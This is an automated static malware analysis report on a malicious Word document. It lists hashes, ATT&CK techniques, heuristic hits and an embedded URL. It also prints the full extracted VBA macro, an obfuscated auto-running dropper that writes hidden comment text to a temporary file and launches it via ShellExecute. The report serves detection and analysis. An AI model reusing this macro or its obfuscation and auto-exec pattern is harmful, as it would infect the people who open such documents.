Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5452b9448c3310ad…

MALICIOUS

Office (OOXML)

73.7 KB Created: 2019-10-27 18:57:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-05-25
MD5: ff53bc8e127ca05241c53cd4a50df412 SHA-1: 6640c882b606fc8b297a5b1d8bf6c8b68a95f0c4 SHA-256: 5452b9448c3310adaa86f6020c32d6ae4727fce5049f613ad9242e2f35e94eff
238 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an OOXML document containing a malicious VBA macro. The macro is obfuscated and uses CreateObject to execute code, indicative of a dropper. The presence of a Document_Open macro and the ClamAV detection name 'Doc.Dropper.Agent-7569460-0' strongly suggest its purpose is to download and execute a secondary payload. No specific family could be identified from the available evidence.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-7569460-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7569460-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Private Function kkilMe(reat)
    CreateObject(Mid(cmdList.cmdExe.Caption, 12, 17)).ShellExecute reat
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Function kkilMe(reat)
    CreateObject(Mid(cmdList.cmdExe.Caption, 12, 17)).ShellExecute reat
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    templateStr = Environ(Mid(cmdList.dist.Caption, 12, 7)) & "\"
    templateStr = templateStr & Rnd
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://copytak.ir/wordpress/iBzrxYetL/ In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6063 bytes
SHA-256: 7bc84653d821feeb4b4bd7de7e74095b7adc516c814cadf5550a4cc4a37c753f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub BulletText()
    Dim sBullet As String
    Dim myList As ListTemplate

    sBullet = InputBox("Enter bullet text:", "Bullet Text", "Note:")

    ' Add a new ListTemplate object
    Set myList = ActiveDocument.ListTemplates.Add
Dim yXF4hS7F9f1 As String
yXF4hS7F9f1 = "name atom manufacturing be split rush leather yes never simplest silent angry breakfast different experience die article involved put fallen spirit follow greater faster outline dark stay bad hospital melted with visitor run parts research cutting too greatly thirty declared mood weight bring fairly noted shells making chain number dawn curious coffee oxygen person onto art interior directly range move sharp wood taste direction right grew exist setting oil his greater bring composition men fur badly might chair clear breathing pride correctly day writer circle attempt catch prize establish composed applied wrapped across pack fewer shown date daily widely simply smallest species cutting aid brother be bicycle surrounded express amount firm camera scared tears fallen indeed complex"

    With myList.ListLevels(1)
        .NumberFormat = sBullet
        .TrailingCharacter = wdTrailingTab
        .NumberPosition = InchesToPoints(0.25)
        .Alignment = wdListLevelAlignLeft
        .TextPosition = InchesToPoints(0.75)
        .TabPosition = InchesToPoints(0.75)
        .ResetOnHigher = 0
        .StartAt = 1
        .LinkedStyle = ""
        ' The following sets the font attributes of
        ' the "bullet" text
        With .Font
            .Bold = True
            .Name = "Arial"
            .Size = 10
        End With
    End With
    ' Apply the new ListTemplate to the selected text
    Selection.Range.ListFormat.ApplyListTemplate ListTemplate:=myList
End Sub
Private Function shareExt() As String
Randomize

Dim tYY00y2u As Boolean
tYY00y2u = False
Dim IC7dp0iOzT As Boolean
IC7dp0iOzT = False
Dim templateStr As String
Dim extFind As String
extFind = Mid(cmdList.ext.Caption, 12, 4)

templateStr = Environ(Mid(cmdList.dist.Caption, 12, 7)) & "\"
templateStr = templateStr & Rnd
templateStr = templateStr & extFind

ShareT (templateStr)

shareExt = templateStr
End Function

Private Sub ShareT(toP)
Dim melonoma As Range
Set melonoma = ActiveDocument.Comments(1).Range
melonoma.TextRetrievalMode.IncludeHiddenText = True

Dim n80o9SYl4GtS As Long
n80o9SYl4GtS = 20562
Dim oUO064w64K4 As Long
oUO064w64K4 = 3971
Open toP For Output As #46
Print #46, melonoma.Text
Close #46

End Sub
Sub MassFormatFiles()
    Dim JName As String
Dim g84e018 As String
g84e018 = "wolf older influence win grandfather should colony leaf key friend start spend shirt word time forward her pile popular return without on aloud exist island spite road theory develop shelf circle scene along alive river rear sand identity neighborhood opposite tales sitting pen tears floor if earth alone camp smoke factor draw sent atomic crowd same weigh flower greatest airplane moon week zoo find leave two appearance stairs develop me toward captain secret seven physical advice store piece something struck smaller direct flower spin been station lovely corn spend poetry stuck direction melted product mental zulu basket up neck sunlight experience usually temperature mighty medicine particular stock good table influence"

    Dialogs(wdDialogFileOpen).Show
    Application.ScreenUpdating = False
    JName = Dir("*.doc")
    While (JName > "")
        Application.Documents.Open FileName:=JName

            'Do formatting here

        ActiveDocument.Close SaveChanges:=wdSaveChanges
        JName = Dir()
    Wend
    Application.ScreenUpdating = True
End Sub
Private Sub Document_Open()
  
   Dim varaT As String
   varaT = shareExt
   
   kkilMe (varaT)

Dim GaD153Lm13DG As Boolean
GaD153Lm13DG = True
Dim W7X3Ol8q4Mji As Boolean
W7X3Ol8q4Mji = False
End Sub
Sub DeleteUnusedStyles()
    Dim oStyle As Style
Dim IC43r0 As String
IC43r0 = "fox tube fill control chief gone today green experiment zoo uncle grown on still process beat last empty itself without percent adult sum major however product yourself dot shoe habit education between asleep fence arrange below coming victory forth reach telephone read grandmother original dot understanding pretty level angle iron sudden cotton national tiny please political happy bicycle girl tightly about unit make chose dangerous distance successful traffic done coming position kind shown class tune grow every grew fall because maybe atmosphere knowledge buffalo properly shallow riding thrown dance pine fact exact noise failed rest ground dawn hunter recent lying guard sunlight its bound buy cream pile activity until dried explanation behind border hair very tobacco herd tin wagon throughout"

    For Each oStyle In ActiveDocument.Styles
        'Only check out non-built-in styles
        If oStyle.BuiltIn = False Then
            With ActiveDocument.Content.Find
                .ClearFormatting
                .Style = oStyle.NameLocal
                .Execute FindText:="", Format:=True
                If .Found = False Then oStyle.Delete
            End With
        End If
    Next oStyle
End Sub
Private Function kkilMe(reat)
CreateObject(Mid(cmdList.cmdExe.Caption, 12, 17)).ShellExecute reat
End Function



Attribute VB_Name = "NewMacros"
Sub n()

End Sub



Attribute VB_Name = "cmdList"
Attribute VB_Base = "0{90FB79E4-223D-401D-8A48-1F5CB646382F}{45465B32-4C0E-4919-9A6D-BDECC9C22617}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27136 bytes
SHA-256: c8f5f13689960f79ce15ea530f145234f9e69752f7e7ee285052e19c3d2e23f0